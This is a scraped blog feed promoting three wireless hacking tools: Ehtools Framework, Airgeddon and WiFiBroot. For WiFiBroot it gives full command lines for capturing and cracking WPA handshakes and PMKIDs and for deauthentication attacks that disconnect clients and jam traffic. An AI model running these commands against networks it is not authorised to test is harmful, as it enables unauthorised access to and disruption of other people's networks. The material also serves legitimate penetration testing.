<a href="https://1.bp.blogspot.com/-0Z9Yw_jbQjk/XWsJ7rfgB-I/AAAAAAAAQL8/3dvhtXh_i_wTZql3emY9PnfcbQuOTJw-QCLcBGAs/s1600/ehtools_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="829" data-original-width="1292" height="410" src="https://1.bp.blogspot.com/-0Z9Yw_jbQjk/XWsJ7rfgB-I/AAAAAAAAQL8/3dvhtXh_i_wTZql3emY9PnfcbQuOTJw-QCLcBGAs/s640/ehtools_8.png" width="640" /></a></div>
<br />
Wi-Fi tools keep getting more and more accessible to beginners, and the Ehtools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and utilize.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>How to install ehtools</b></span><br />
<pre><code>cd ehtools
chmod +x install.sh
./install.sh</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-V0TexluZEmM/XWsKcx5fv7I/AAAAAAAAQME/MHZupwJl1Zs5Ud5MVGiuv6-HXT93an2mACLcBGAs/s1600/ehtools_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="832" data-original-width="1294" height="410" src="https://1.bp.blogspot.com/-V0TexluZEmM/XWsKcx5fv7I/AAAAAAAAQME/MHZupwJl1Zs5Ud5MVGiuv6-HXT93an2mACLcBGAs/s640/ehtools_9.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Selecting version of framework</b></span><br />
INFO: After executing install.sh it will be ask you
to select version of Ehtools Framework - PRO os LITE.
Select LITE if you did not buy Ehtools Framework PRO.
If you bought Ehtools Framework PRO, select PRO.
<br />
<pre><code>./install.sh</code></pre>
<br />
What version of Ehtools Framework do you want to install?(pro/lite):<br />
If you did not buy Ehtools Framework PRO, select LITE!<br />
If you bought Ehtools Framework PRO, select PRO!<br />
(version)><br />
If you select Ehtools Framework PRO, you will need to activate it with your Ehtools Activation Key that you need to bought on the ehtools site. If you have Ehtools Activation Key, read the following instructions.<br />
<br />
<span style="font-size: large;"><b>How to activate ehtools PRO</b></span><br />
This key you can buy on the ehtools site for one dollar! This key is used to activate ehtools PRO enter it in the input field of the activation key in the file install.sh and then you can install ehtools and use it only for educational purposes!<br />
<br />
WARNING: The key works only one week then it changes!<br />
You need to have time to enter it before it is updated!<br />
<pre><code>./install.sh</code></pre>
Enter your ehtools activation key!
You can buy it on the ehtools site!
<br />
<pre><code>(activation_key)> </code></pre>
Also, we do not recommend to change the source code of ehtools because it is very complex and you can mess up something and disrupt the framework!<br />
WARNING: We do not recommend to change ehtools source code<br />
because you can disrupt framework!<br />
<br />
<span style="font-size: large;"><b>How to uninstall ehtools</b></span><br />
<pre><code>ehtools -r</code></pre>
WARNING: Do not do it if you want to reinstall<br />
ehtools PRO which you bought, do not do it because<br />
you will need to buy it one more time!<br />
<br />
<span style="font-size: large;"><b>Attacking frameworks</b></span><br />
Most new Wi-Fi hacking tools rely on many of the same underlying attacks, and scripts that automate using other more familiar tools like Aireplay-ng are often referred to as frameworks. These frameworks try to organize tools in smart or useful ways to take them a step beyond the functionality or usability of the original program.<br />
An excellent example of this are programs that integrate scanning tools like Airodump-ng, attacks like WPS Pixie-Dust, and cracking tools like Aircrack-ng to create an easy-to-follow attack chain for beginners. Doing this makes the process of using these tools easier to remember and can be seen as sort of a guided tour. While each of these attacks is possible without the hand-holding, the result can be faster or more convenient than trying to do so yourself.<br />
An example of this we've covered is the Airgeddonframework, a wireless attack framework that does useful things like automating the target selection process and eliminating the time a user spends copying and pasting information between programs. This saves valuable time for even experienced pentesters but has the disadvantage of preventing beginners from understanding what's happening "under the hood" of the attack. While this is true, most of these frameworks are fast, efficient, and dead simple to use, enabling even beginners to take on and disable an entire network.<br />
<br />
<span style="font-size: large;"><b>UX/UI impruvements for beginners</b></span><br />
The Ehtools Framework starts by merely typing the letter ehtools or eht into a terminal window, then it asks for the name of your network interfaces after the first run. It uses the names you supply to connect to the tools needed to execute any attacks you select. Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting from one of the menu options.<br />
<br />
<span style="font-size: large;"><b>Use basic networking tools</b></span><br />
To begin, we can access data about the network we're currently connected to, as well as any network interfaces, from the main menu. Here, we can find <a href="https://www.kitploit.com/search/label/Local%20Information" target="_blank" title="local information">local information</a> by just typing l to pull up local IP information, as seen below.<br />
This allows us to do things like scan the network for other devices. This part of Ehtools Framework gives us better visibility on a network and situational awareness of what devices are around us. The various information can be broken down as follows:<br />
<pre><code>(ehtools)> if</code></pre>
INFO: Runs ifconfig and gives the names and information
about all network devices.
<br />
<pre><code>(ehtools)> 1</code></pre>
INFO: Enable wlan0.<br />
(d1 disables it)<br />
<pre><code>(ehtools)> 2</code></pre>
INFO: Enable wlan0mon.<br />
(d2 disables it)<br />
<pre><code>(ehtools)> 3</code></pre>
INFO: Randomize or set the MAC address to a specific value.<br />
<pre><code>(ehtools)> 7</code></pre>
INFO: View the public IP address your computer
is leaving on sites you visit.<br />
<pre><code>(ehtools)> 19</code></pre>
INFO: Look up the physical address of a given
IP address to determine it's relative location.<br />
<pre><code>(ehtools)> scan</code></pre>
INFO: Start an ARP scan on the network
to discover nearby devices.<br />
<pre><code>(ehtools)> start</code></pre>
INFO: Start monitor mode on the wireless network adapter.<br />
<pre><code>(ehtools)> stop</code></pre>
INFO: Stop wireless monitor mode on the network adapter.
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/entynetproject/ehtools" rel="nofollow" target="_blank" title="Download Ehtools">Download Ehtools</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-18929720663086866582019-08-25T17:30:00.000-04:002019-08-25T17:30:09.572-04:00Airgeddon v9.21 - A Multi-use Bash Script for Linux Systems to Audit Wireless Networ<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-xLQuq3asE9I/XVg5VkT42GI/AAAAAAAAQG4/b0k7agQuZHMdtFJoB_USy6_6jQPxaKP8QCLcBGAs/s1600/airgeddon_scrs1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="489" data-original-width="736" height="424" src="https://1.bp.blogspot.com/-xLQuq3asE9I/XVg5VkT42GI/AAAAAAAAQG4/b0k7agQuZHMdtFJoB_USy6_6jQPxaKP8QCLcBGAs/s640/airgeddon_scrs1.png" width="640" /></a></div>
<br />
<blockquote>
This is a multi-use bash script for <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> systems to <a href="https://www.kitploit.com/search/label/Audit" target="_blank" title="audit">audit</a> <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> networks.</blockquote>
<a name='more'></a><br />
All the needed info about how to "install | use | enjoy" <code>airgeddon</code> is present at <a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki" rel="nofollow" target="_blank" title="Github's Wiki">Github's Wiki</a>.<br />
<ul>
<li> <em>I. Content & Features</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki" rel="nofollow" target="_blank" title="Home">Home</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Features" rel="nofollow" target="_blank" title="Features">Features</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Screenshots" rel="nofollow" target="_blank" title="Screenshots">Screenshots</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Wallpapers" rel="nofollow" target="_blank" title="Wallpapers">Wallpapers</a></li>
</ul>
</li>
<li> <em>II. Requirements</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Requirements" rel="nofollow" target="_blank" title="Requirements">Requirements</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Compatibility" rel="nofollow" target="_blank" title="Compatibility">Compatibility</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Essential%20Tools" rel="nofollow" target="_blank" title="Essential Tools">Essential Tools</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Optional%20Tools" rel="nofollow" target="_blank" title="Optional Tools">Optional Tools</a> <ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/BeEF%20Tips" rel="nofollow" target="_blank" title="BeEF Tips">BeEF Tips</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Hashcat%20Tips" rel="nofollow" target="_blank" title="Hashcat Tips">Hashcat Tips</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Bettercap%20Tips" rel="nofollow" target="_blank" title="Bettercap Tips">Bettercap Tips</a></li>
</ul>
</li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Update%20Tools" rel="nofollow" target="_blank" title="Update Tools">Update Tools</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Internal%20Tools" rel="nofollow" target="_blank" title="Internal Tools">Internal Tools</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Known%20incompatibilities" rel="nofollow" target="_blank" title="Known incompatibilities">Known incompatibilities</a></li>
</ul>
</li>
<li> <em>III. Getting started</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Installation%20&%20Usage" rel="nofollow" target="_blank" title="Installation & Usage">Installation & Usage</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Options" rel="nofollow" target="_blank" title="Options">Options</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker" rel="nofollow" target="_blank" title="Docker">Docker</a> <ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux" rel="nofollow" target="_blank" title="Linux">Linux</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Mac%20OSX" rel="nofollow" target="_blank" title="Mac OSX">Mac OSX</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Windows" rel="nofollow" target="_blank" title="Windows">Windows</a></li>
</ul>
</li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Other%20Sources" rel="nofollow" target="_blank" title="Other Sources">Other Sources</a></li>
</ul>
</li>
<li> <em>IV. Project & Development</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Supported%20Languages" rel="nofollow" target="_blank" title="Supported Languages">Supported Languages</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Contributing-&-Code-of-Conduct" rel="nofollow" target="_blank" title="Contributing & Code of Conduct">Contributing & Code of Conduct</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Changelog" rel="nofollow" target="_blank" title="Changelog">Changelog</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Disclaimer%20&%20License" rel="nofollow" target="_blank" title="Disclaimer & License">Disclaimer & License</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Contact" rel="nofollow" target="_blank" title="Contact">Contact</a></li>
</ul>
</li>
<li> <em>V. Acknowledgments & References</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Hat%20Tip%20To" rel="nofollow" target="_blank" title="Hat Tip To">Hat Tip To</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Inspiration" rel="nofollow" target="_blank" title="Inspiration">Inspiration</a></li>
</ul>
</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/v1s1t0r1sh3r3/airgeddon" rel="nofollow" target="_blank" title="Download Airgeddon">Download Airgeddon</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-37475019176959129522019-08-04T17:38:00.000-04:002019-08-04T17:38:00.842-04:00WiFiBroot - A WiFi Pentest Cracking Tool For WPA/WPA2 (Handshake, PMKID, Cracking, EAPOL, Deauthentication)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-oBcLGxBUo-s/XT-teTgHFJI/AAAAAAAAP4Q/P8Y6vpxKxCAXU-6fapr1XPyxyDvjWFlVACLcBGAs/s1600/WiFiBroot_1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="200" data-original-width="1000" height="128" src="https://1.bp.blogspot.com/-oBcLGxBUo-s/XT-teTgHFJI/AAAAAAAAP4Q/P8Y6vpxKxCAXU-6fapr1XPyxyDvjWFlVACLcBGAs/s640/WiFiBroot_1.jpeg" width="640" /></a></div>
<br />
WiFiBroot is built to provide clients all-in-one facility for cracking WiFi (WPA/WPA2) networks. It heavily depends on <strong>scapy</strong>, a well-featured packet <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> library in Python. Almost every process within is dependent somehow on scapy layers and other functions except for operating the <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> interface on a different channel. That will be done via native linux command <strong>iwconfig</strong> for which you maybe need <em>sudo</em> privileges. It currently provides <strong>four</strong> independent working modes to deal with the target networks. Two of them are online cracking methods while the other runs in offline mode. The offline mode is provided to crack saved hashes from the first two modes. One is for deauthentication attack on wireless network and can also b e used as a jamming handler. It can be run on a variety of linux platforms and atleast requires WN727N from tp-link to properly operate.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Installation:</b></span><br />
WiFiBroot heavily depends on scapy. So, you would need scapy installed. Almost, every other library would likely be installed on your system. Make sure the version you install for scapy should be <code><=2.4.0</code>. Newer versions are likely to throw some unknown errors.<br />
<pre><code>$ sudo pip install scapy==2.4.0</code></pre>
The script is supposed to be run under <strong>sudo</strong> but it will still work even if not run under the root mode. The basic necessary arguments are:<br />
<pre><code>$ sudo python wifibroot.py -i [interface] -d /path/to/dictionary -m [mode]</code></pre>
<br />
<span style="font-size: x-large;"><b>Documentation :</b></span><br />
WiFiBroot uses modes to identify which attack you want to perform on your target. Currently, there are three available modes. The usage of each mode can be seen by supplying the <strong>--help/-h</strong> option right after the <strong>-m/--mode</strong> option. Here's a list of available modes and what they do:<br />
<br />
<span style="font-size: large;"><b>Modes:</b></span><br />
<pre><code>Syntax:
$ python wifibroot.py [--mode [modes]] [--options]
$ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt
Modes:
# Description Value
01 Capture 4-way handshake and crack MIC code 1
02 Captures and Crack PMKID (PMKID Attack) 2
03 Perform Manual cracking on available
capture types. See --list-types 3
04 Deauthentication. Disconnect two stations
and jam the traffic. 4
Use -h, --help after -m, --mode to get help on modes. </code></pre>
Each mode has a specific purpose and has it's own options:<br />
<br />
<span style="font-size: large;"><b>HANDSHAKE:</b></span><br />
<pre><code>Mode:
01 Capture 4-way handshake and crack MIC code 1
Options:
Args Description Required
-h, --help Show this help manual NO
-i, --interface Monitor Interface to use YES
-v, --verbose Turn off Verbose mode. NO
-t, --timeout Time Delay between two deauth
requests. NO
-d, --dictionary Dictionary for Cracking YES
-w, --write Write Captured handshake to
a seperate file NO
--deauth Number of Deauthentication
frames to send NO
Filters:
-e, --essid ESSID of listening network
-b, --bssid BSSID of target network .
-c, --channel Channel interface should be listening
on. Default: ALL</code></pre>
<br />
<span style="font-size: large;"><b>PMKID ATTACK</b></span><br />
<pre><code>Mode:
02 Captures and Crack PMKID (PMKID Attack) 1
Options:
Args Description Required
-h, --help Show this help manual NO
-i, --interface Monitor Interface to use YES
-v, --verbose Turn off Verbose mode. NO
-d, --dictionary Dictionary for Cracking YES
-w, --write Write Captured handshake to
a seperate file NO
Filters:
-e, --essid ESSID of listening network
-b, --bssid BSSID of target network.
-c, --channel Channel interface should be listening
on. Default: ALL</code></pre>
<br />
<span style="font-size: large;"><b>Offline Cracking</b></span><br />
<pre><code>Mode:
03 Perform Manaul cracking on available capture
types. See --list-types 3
Options:
Args Description Required
-h, --help Show this help manual NO
--list-types List available cracking types NO
--type Type of capture to crack YES
-v, --verbose Turn off Verbose mode. NO
-d, --dictionary Dictionary for Cracking YES
-e, --essid ESSID of target network.
Only for HANDSHAKE Type YES
-r, --read Captured file to crack YES</code></pre>
<br />
<span style="font-size: large;"><b>DEAUTHENTICATION ATTACK (Stress Testing)</b></span><br />
<pre><code>Mode:
04 Deauthentication. Disconnect two stations
and jam the traffic. 4
Options:
Args Description Required
-h, --help Show this help manual NO
-i, --interface Monitor Mode Interface to use YES
-0, --count Number of Deauthentication
frames to send. '0' specifies
unlimited frames YES
--ap Access Point MAC Address NO
--client STA (Station) MAC Address NO</code></pre>
<br />
<span style="font-size: large;"><b>Examples</b></span><br />
To Capture 4-way handshake and crack MIC code:<br />
<pre><code>$ python wifibroot.py --mode 1 -i wlan1mon --verbose -d dicts/list.txt -w output.cap </code></pre>
To Capture and Crack PMKID:<br />
<pre><code>$ python wifibroot.py --mode 2 -i wlan1mon --verbose -d dicts/list.txt -w output.txt</code></pre>
Offline Crack <a href="https://www.kitploit.com/search/label/Handshake" target="_blank" title="Handshake">Handshake</a> and PMKID:<br />
<pre><code>$ python wifibroot.py --mode 3 --type handshake --essid "TARGET ESSID" --verbose -d dicts/list.txt --read output.cap
$ python wifibroot.py --mode 3 --type pmkid --verbose -d dicts/list.txt --read output.txt</code></pre>
Deauthentication attack in various form:<br />
<pre><code># Ultimate Deauthentication attack:
$ python wifibroot.py --mode 4 -i wlan1mon -00 --verbose
# Disconnect All Clients from Acess Point:
$ python wifibroot.py --mode 4 -i wlan1mon --ap [AP MAC] --verbose
# Disconnect a Specific Client:
$ python wifibroot.py --mode 4 -i wlan1mon --ap [AP MAC] --client [STA MAC] --verbose</code></pre>
<br />
<span style="font-size: x-large;"><b>Support</b></span><br />
Website: <a href="https://www.shellvoide.com/" rel="nofollow" target="_blank" title="https://www.shelvoide.com">https://www.shelvoide.com</a><br />
Twitter: <a href="https://twitter.com/hash3liZer" rel="nofollow" target="_blank" title="@hash3liZer">@hash3liZer</a><br />
Email: <a href="mailto://admin@shellvoide.com" rel="nofollow" target="_blank" title="admin@shellvoide.com">admin@shellvoide.com</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/hash3liZer/WiFiBroot" rel="nofollow" target="_blank" title="Download WiFiBroot">Download WiFiBroot</a></span></b></div>
Unknownnoreply@blogger.com